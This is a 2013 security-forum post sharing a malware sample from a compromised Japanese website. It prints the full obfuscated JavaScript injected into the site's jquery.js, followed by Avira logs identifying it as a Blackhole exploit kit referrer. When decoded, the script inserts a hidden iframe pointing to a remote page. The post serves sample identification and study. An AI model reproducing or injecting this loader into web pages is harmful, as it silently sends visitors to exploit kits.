收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 网络安全(毒网分析) http://isan.macmode.jp/
返回列表 发新帖
查看: 1722|回复: 0
收起左侧

[已鉴定] http://isan.macmode.jp/

[复制链接]
fireold
发表于 2013-9-23 19:24:12 | 显示全部楼层 |阅读模式
  1. /*d68107*/
  2. r = eval;

  4. function vqvq() {
  5.     zva = function() {
  6.         --(d.body)
  7.     }()
  8. };
  9. a = ("47,155,174,165,152,173,160,166,165,47,201,165,170,173,67,100,57,60,47,202,24,21,47,175,150,171,47,172,173,150,173,160,152,104,56,150,161,150,177,56,102,24,21,47,175,150,171,47,152,166,165,173,171,166,163,163,154,171,104,56,160,165,153,154,177,65,167,157,167,56,102,24,21,47,175,150,171,47,201,165,170,173,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,201,165,170,173,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,200,174,64,162,160,64,162,65,152,166,164,66,162,150,160,157,150,173,172,174,66,176,117,133,162,130,111,115,171,65,167,157,167,56,102,24,21,47,201,165,170,173,65,172,173,200,163,154,65,167,166,172,160,173,160,166,165,47,104,47,56,150,151,172,166,163,174,173,154,56,102,24,21,47,201,165,170,173,65,172,173,200,163,154,65,152,166,163,166,171,47,104,47,56,70,77,77,56,102,24,21,47,201,165,170,173,65,172,173,200,163,154,65,157,154,160,156,157,173,47,104,47,56,70,77,77,167,177,56,102,24,21,47,201,165,170,173,65,172,173,200,163,154,65,176,160,153,173,157,47,104,47,56,70,77,77,167,177,56,102,24,21,47,201,165,170,173,65,172,173,200,163,154,65,163,154,155,173,47,104,47,56,70,67,67,67,70,77,77,56,102,24,21,47,201,165,170,173,65,172,173,200,163,154,65,173,166,167,47,104,47,56,70,67,67,67,70,77,77,56,102,24,21,24,21,47,160,155,47,57,50,153,166,152,174,164,154,165,173,65,156,154,173,114,163,154,164,154,165,173,111,200,120,153,57,56,201,165,170,173,56,60,60,47,202,24,21,47,153,166,152,174,164,154,165,173,65,176,171,160,173,154,57,56,103,167,47,160,153,104,143,56,201,165,170,173,143,56,47,152,163,150,172,172,104,143,56,201,165,170,173,67,100,143,56,47,105,103,66,167,105,56,60,102,24,21,47,153,166,152,174,164,154,165,173,65,156,154,173,114,163,154,164,154,165,173,111,200,120,153,57,56,201,165,170,173,56,60,65,150,167,167,154,165,153,112,157,160,163,153,57,201,165,170,173,60,102,24,21,47,204,24,21,204,24,21,155,174,165,152,173,160,166,165,47,132,154,173,112,166,166,162,160,154,57,152,166,166,162,160,154,125,150,164,154,63,152,166,166,162,160,154,135,150,163,174,154,63,165,113,150,200,172,63,167,150,173,157,60,47,202,24,21,47,175,150,171,47,173,166,153,150,200,47,104,47,165,154,176,47,113,150,173,154,57,60,102,24,21,47,175,150,171,47,154,177,167,160,171,154,47,104,47,165,154,176,47,113,150,173,154,57,60,102,24,21,47,160,155,47,57,165,113,150,200,172,104,104,165,174,163,163,47,203,203,47,165,113,150,200,172,104,104,67,60,47,165,113,150,200,172,104,70,102,24,21,47,154,177,167,160,171,154,65,172,154,173,133,160,164,154,57,173,166,153,150,200,65,156,154,173,133,160,164,154,57,60,47,62,47,72,75,67,67,67,67,67,61,71,73,61,165,113,150,200,172,60,102,24,21,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,47,104,47,152,166,166,162,160,154,125,150,164,154,62,51,104,51,62,154,172,152,150,167,154,57,152,166,166,162,160,154,135,150,163,174,154,60,24,21,47,62,47,51,102,154,177,167,160,171,154,172,104,51,47,62,47,154,177,167,160,171,154,65,173,166,116,124,133,132,173,171,160,165,156,57,60,47,62,47,57,57,167,150,173,157,60,47,106,47,51,102,47,167,150,173,157,104,51,47,62,47,167,150,173,157,47,101,47,51,51,60,102,24,21,204,24,21,155,174,165,152,173,160,166,165,47,116,154,173,112,166,166,162,160,154,57,47,165,150,164,154,47,60,47,202,24,21,47,175,150,171,47,172,173,150,171,173,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,160,165,153,154,177,126,155,57,47,165,150,164,154,47,62,47,51,104,51,47,60,102,24,21,47,175,150,171,47,163,154,165,47,104,47,172,173,150,171,173,47,62,47,165,150,164,154,65,163,154,165,156,173,157,47,62,47,70,102,24,21,47,160,155,47,57,47,57,47,50,172,173,150,171,173,47,60,47,55,55,24,21,47,57,47,165,150,164,154,47,50,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,172,174,151,172,173,171,160,165,156,57,47,67,63,47,165,150,164,154,65,163,154,165,156,173,157,47,60,47,60,47,60,24,21,47,202,24,21,47,171,154,173,174,171,165,47,165,174,163,163,102,24,21,47,204,24,21,47,160,155,47,57,47,172,173,150,171,173,47,104,104,47,64,70,47,60,47,171,154,173,174,171,165,47,165,174,163,163,102,24,21,47,175,150,171,47,154,165,153,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,160,165,153,154,177,126,155,57,47,51,102,51,63,47,163,154,165,47,60,102,24,21,47,160,155,47,57,47,154,165,153,47,104,104,47,64,70,47,60,47,154,165,153,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,163,154,165,156,173,157,102,24,21,47,171,154,173,174,171,165,47,174,165,154,172,152,150,167,154,57,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,172,174,151,172,173,171,160,165,156,57,47,163,154,165,63,47,154,165,153,47,60,47,60,102,24,21,204,24,21,160,155,47,57,165,150,175,160,156,150,173,166,171,65,152,166,166,162,160,154,114,165,150,151,163,154,153,60,24,21,202,24,21,160,155,57,116,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,201,165,170,173,67,100,57,60,102,24,21,204,24,21,204".split(","));
  10. d = document;
  11. for (i = 0; i < a.length; i += 1) {
  12.     a[i] = -(10 - 3) + parseInt(a[i], 4 + 4);
  13. }
  14. try {
  15.     vqvq()
  16. } catch (q) {
  17.     yy = 50 - 50;
  18. }
  19. try {
  20.     yy /= 72
  21. } catch (pq) {
  22.     yy = 1;
  23. }
  24. if (!yy) r(String["fr" + "omCh" + "arCo" + "de"].apply(String, a)); /*/d68107*/
复制代码



Avira
2013/9/23 下午 07:21 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\1YP0JPM6\jquery[3].js'
      包含病毒或有害的程式 'JS/BlacoleRef.DD.40' [virus]
      已採取動作:
      檔案會移動至 '54ca84d0.qua' 名稱底下的隔離區目錄。.

2013/9/23 下午 07:21 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數:        846
      目錄數:        0
      惡意程式碼數:        1
      警告數:        0

2013/9/23 下午 07:20 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\1YP0JPM6\jquery[3].js 中
      偵測到病毒或有害的程式 'JS/BlacoleRef.DD.40 [virus]'
      執行的動作:傳輸至掃描程式

2013/9/23 下午 07:20 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\1YP0JPM6\jquery[3].js 中
      偵測到病毒或有害的程式 'JS/BlacoleRef.DD.40 [virus]'
      執行的動作:拒絕存取

2013/9/23 下午 07:20 [Web Protection] 發現惡意程式碼
      從 URL "http://isan.macmode.jp/common/js/jquery.js" 存取資料時,
      發現病毒或有害的程式 'JS/BlacoleRef.DD.40' [virus]。
      已採取動作:已略過

2013/9/23 下午 07:20 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\A1VVYTC4\isan_macmode_jp[1].htm 中
      偵測到病毒或有害的程式 'JS/BlacoleRef.DD.40 [virus]'
      執行的動作:拒絕存取

2013/9/23 下午 07:20 [Web Protection] 發現惡意程式碼
      從 URL "http://isan.macmode.jp/" 存取資料時,
      發現病毒或有害的程式 'JS/BlacoleRef.DD.40' [virus]。
      已採取動作:已略過


av.jpg



fs.jpg
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-4 11:06 , Processed in 0.200317 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表